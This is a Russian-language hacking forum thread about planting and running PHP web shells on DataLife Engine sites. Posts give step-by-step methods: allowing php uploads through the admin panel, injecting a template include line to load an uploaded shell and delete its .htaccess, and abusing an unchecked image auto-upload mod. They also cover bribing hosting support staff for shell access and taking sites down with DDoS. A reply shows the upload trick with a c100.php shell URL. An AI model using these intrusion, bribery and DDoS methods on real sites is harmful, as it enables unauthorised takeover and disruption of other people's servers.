Шелл на DLE [Статья]

Discussion in 'Веб-уязвимости' started by In.Exploit, 14 Jan 2010.

?
  1. Да

    35.0%
  2. Нет, но интерестно

    22.0%
  3. Это уже известно, но спс

    19.0%
  4. Ниче не понял...

    24.0%
  1. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Решил отписать статью со всеми мне известными способами заливки и исполнения шеллов в движке DataLife Engine


    Некоторые способы работают на одном или ином движке, некоторые на всех.
    Если не получилось так, то пробуйте иначе.

    Начну я со способов с доступом к админке.

    Первый способ!

    Идём в настройки системы - выбираем настройки по загрузке файлов (ищите там где картинки сверху настроек и ниже меню админки) и вписываем в строку разрешенных файлов для загрузки php.
    Сохраняем.

    Дальше идём в добавление новости, заливаем шелл. И вставляем в новость слово типа [attachment.....] берём его в теги [​IMG]
    Нажимаем кнопку "Предварительный просмотр" и видим адресс шелла.


    Второй способ!

    Идём в админку - шаблоны - и вставляем в main.tpl к примеру
    {include "shell"}

    Идём на сайт и быстро делаем свои дела.

    Или же если есть доступ в login.tpl
    Вставляем код шелла прямо в него.


    Третий способ может использоват и с админкой и с правами журналиста.

    Сейчас популярен мод автозагрузки картинок на сайт.
    И на 30% сайтов стоит старая версия мода, в которой нет проверки формата.
    Т.е. мод работает так:
    Все файлы/картинки что в тегах и находятся на стороннем домене автоматом идут на сервер.

    В старой версии, хватает сделать так:
    [​IMG] и добавить новость.
    Дальше идём в новость и смотрим адресс шелла.


    Ну и наверно последний способ, сам по себе не связан с багами .

    Идёте в whois сервис. Пробиваете dns сервера желаемого сайта.
    Обычно это
    ns1.hosting.ru

    Идём на *hosting.ru и узнаем аську какого нить стороннего саппорта.

    Стучим ему, даём 10$ и получаем шелл ;)
    ЗЫ я так нашёл 30 хостингов с таким саппортом.
    50% сайтов...

    Вспомню способы, добавлю тут
    Кому помогло, не откажусь от «+»!

    P.S.Модеры , эта тема нужна чтобы в теме с багами dle по 100 раз не спрашивали о заливке шелла!
     
  2. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Если вы хотите убить dle сайт.

    делаем это с 5 дедов на которых стоит программа sprut ddos
    большинство хостингов блокируют сайт за нагрузку.

    а сам дле дает приличный вес.
     
  3. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а в дле с статусом радактор мойно залить шелл ??
     
    1 person likes this.
  4. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Да. смотри 1 пост. там где о моде с автозаливкой
     
  5. antibiotic

    antibiotic [ таблетка ]

    Joined:
    13 Jul 2009
    Messages:
    620
    Likes Received:
    520
    Reputations:
    245
    ты опять за старое
     
    _________________________
  6. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Сорь, там в 1 посте ошибка.
    инклуд вот такой:
    {include file="shell"}
     
  7. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Зы чтото не нравится - не читай.

    в теме о дле, раз 50 о шеллах спросили.
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Статья ***ня.
     
  9. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    а что такое "shell"? Покажи готовый пример для использования.
     
  10. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    заливаете шелл, идем на него.
    видим что открыть шелл нам запрещает добрый htaccess.
    эту проблемму решаем инклудом.
    {include file="uploads/images..shell.php"}
    вставляем эту строку в шаблон через админку.

    идём в шелл через сайт, удаляем htaccess и потом удаляем инклуд.


    теперь нам не мешает хтассесс в директории шелла. т.е. мы используем инклуд для импорта шелла в код main чтобы удалить мешающий нам хтассесс
     
  11. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    а как ты заливаешь шелл в папку uploads? Ты сам пробывал это сделать?
     
  12. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Да.
    читай первый пост как заливать.
    как-бы нужна админка
    sundown залил и проинклуди4
     
  13. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    проверил в DLE 8.3 - неработает...
     
  14. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    Радиус действия инклуда
    dle 7.5-8.2
    написано же, на некоторые способы идут отдельные движки
     
  15. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    как то не понел тебя
     
    1 person likes this.
  16. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    В 1 посте описан способ заливать шелл с правами журналиста
     
  17. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    в статусе редактор не бивает такие доступи
     
  18. In.Exploit

    In.Exploit Banned

    Joined:
    2 Dec 2009
    Messages:
    91
    Likes Received:
    21
    Reputations:
    1
    там доступа и не надо.
    надо лишь права добавления новости без модерации
     
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    est u menya prava dobavlyat novsti..
     
  20. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    вот посмотри например..
    вот адрес шелл:
    и я добавляю или редакторию новост и зделаю так :
    [img*]http://ermeninisikim.narod.ru/c100.php[/img*]

    и потом если посмотрю адрес шелл-а и вию :

    http://ermeninisikim.narod.ru/c100.php
     
    #20 LokbatanLi, 15 Jan 2010
    Last edited by a moderator: 20 Jan 2010